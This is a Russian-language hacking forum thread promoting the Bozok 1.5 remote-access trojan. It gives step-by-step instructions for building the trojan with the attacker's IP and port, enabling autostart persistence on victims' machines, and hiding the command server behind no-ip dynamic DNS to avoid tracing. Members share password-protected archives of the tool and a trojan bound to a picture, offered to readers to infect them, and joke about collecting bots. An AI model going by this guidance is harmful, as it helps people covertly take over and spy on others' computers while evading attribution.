Bozok 1.5 (Не плохой троян категории RAT+ Описание и принцип)

Тема в разделе "Трояны и шпионские программы", создана пользователем X-Shar, 28 янв 2014.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.809
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +960 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Хороший троян разновидности RAT (Remote Administration Tool), включают в себя все необходимые функции для подобного типа троянов, управления файлами, процессами и сервисами, управление реестром, забор изображение с камеры и с экрана монитора, короче всё самое лучшее в традициях RAT.

    GyUnRY1.

    Использование:

    Запускаем, жмём на иконку "ключ", левый нижней угол, (Build) , в открывшемся окне вводим данные. Добавляем свой IP в нижнем секторе вкладки "Connections"(правым щелчком мыши) вводим ip машины на которые будете получать данные с жертвы, заполняем поле пароля и поле порта по дефолту стоит порт 1515, обратите внимание на то что данный порт должен быть у вас открыт, думаю вы найдёте информацию как открыть порт, поэтому заострять внимание на этом не буду.

    Далее в следующих вкладках идут вторичные функции, с которыми вы думаю разберётесь сами, но стоит уделить внимание вкладке Startup, эта вкладка добавляет функцию автозапуска нашего трояна, как она работает, при активной функции, троян будет запускаться при старте с Windows в случаях если жертва перезагрузит компьютер , если же эта функция не активна, то троян запускается только один раз, когда жертва нажмёт на ваш файлик с сюрпризом.

    Предположим сделали билд по дефолту билд создаётся в папку с клиентом, проверяем работоспособность, запускаем наш билд далее открываем клиент Bozok и жмём на шестерёнку "Settings" вводим порт который вы водили при конструкции билда по дефолту порт 1515, и пароль если ваш компьютер отобразился то всё работает, если же нет, то проверьте правильность ввода данных в билде и настройках, а также проверьте открыт ли порт который вы указали.

    Есть русский язык, пароль 111 ! ;)
     

    Вложения:

    • Bozok 1.5.zip
      Размер файла
      1,1 МБ
      Просмотров:
      167
    • Мне нравится Мне нравится x 10
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.809
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +960 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

     
    • Мне нравится Мне нравится x 9
  3. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    Что-то нихера связь не устанавливается с трояном.Я уже фаер и так и эдак ворочал-нифига.Сейчас буду нового Комодо ставить,заодно и попробую без фаера всю эту дребедень запустить.А вот кто захочет может подразнить этого трояна скленного с картинкой (может связь наладится и тоды буду в ваши браузеры зырить).Пароль:111
     

    Вложения:

    • Fotoprikol.rar
      Размер файла
      322,8 КБ
      Просмотров:
      21
    • Мне нравится Мне нравится x 9
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.809
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +960 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    И что много ботов насобирал, 4-ре скачавших уже !Отдыхай!!!
     
    • Мне нравится Мне нравится x 4
  5. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    Да никто походу его не запускает.Да и нормальный антивирь сразу же его пристукнет,а если и не пристукнет,то фаер придушит.
     
    • Мне нравится Мне нравится x 5
  6. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    Сегодня по всем хак-ресурсам выложен обновлённый Bozok 1.5.1.Я подумал,а чем мы хуже.Вон,уже 16 раз скачан .Обновляйтесь,уважаемые "бозоководы"!
    1.

    Изменения в новой версии:
    - changed handshake
    - tweaks on installation routine
    - fixes on connection
    - non-blocking sockets on client-side
    - added Groups
    - added Sidebar
    - small changes in GUI
    - timeout bug fixed
    Пасс на архив:111
     

    Вложения:

    • Bozok 1.5.1.rar
      Размер файла
      1,2 МБ
      Просмотров:
      92
    • Мне нравится Мне нравится x 5
  7. rinavat Пользователь
    rinavat
    Ответить в чате

    Первый уровень

    Регистрация:
    29.05.2014
    Сообщения:
    9
    Симпатии:
    3
    Репа:
    +3 / 0 / -0
    Почему он тут пишет не сам ip в настройках?
     
    • Мне нравится Мне нравится x 1
  8. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    Потому что для работы трояна нужен статический айпи,а не динамический.Ведь динамический айпи,постоянно изменяется,например при перезагрузке модема и троян привязанный к такому айпишнику уже не сможет связаться с хозяином,так как будет "стучать" по старому адресу.Поэтому и применяется данный сервис для создания статичного адреса.А синхронизация твоего динамического айпишника и адреса выданного сервисом происходит с помощью небольшого клиента,в который ты должен ввести данные аккаунта на no-ip .
    Снимок.PNG
    Но если у тебя статический айпишник можешь смело его вводить.Правда если трояныч попадёт не простой "жертве",а челу поумнее он сможет увидеть твой айпишник,например через Process Hacker.
     
    • Мне нравится Мне нравится x 4
    • Информативный пост Информативный пост x 1
  9. ewwa Уважаемый пользователь
    ewwa
    Ответить в чате

    Форумчанин

    Регистрация:
    19.02.2014
    Сообщения:
    157
    Симпатии:
    400
    Пол:
    Мужской
    Репа:
    +402 / 0 / -0
    Я прописывал no-ip и при статическом, мало ли провайдер ченить намутит и все боты отвалятся. no-ip при не активности через какое то время удаляет аккаунт dyndns нет вроде, его можно один адрес на халяву получить, какая то акция zyxel.
     
    • Мне нравится Мне нравится x 3
  10. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    Согласен с ewwa.Хоть и через no-ip можно получить информацию об айпишнике "злоумышленника",но всё же такой вариант,более приемлиемый.
    Так что,rinavat, юзай no-ip вне зависимости от того,какой у тебя айпи.
     
    • Мне нравится Мне нравится x 1
Похожие темы:
  1. X-Shar
    Ответов:
    0
    Просмотров:
    1.544
  2. X-Shar
    Ответов:
    5
    Просмотров:
    1.153
  3. X-Shar
    Ответов:
    0
    Просмотров:
    2.692
  4. X-Shar
    Ответов:
    0
    Просмотров:
    1.531
Загрузка...

Поделиться этой страницей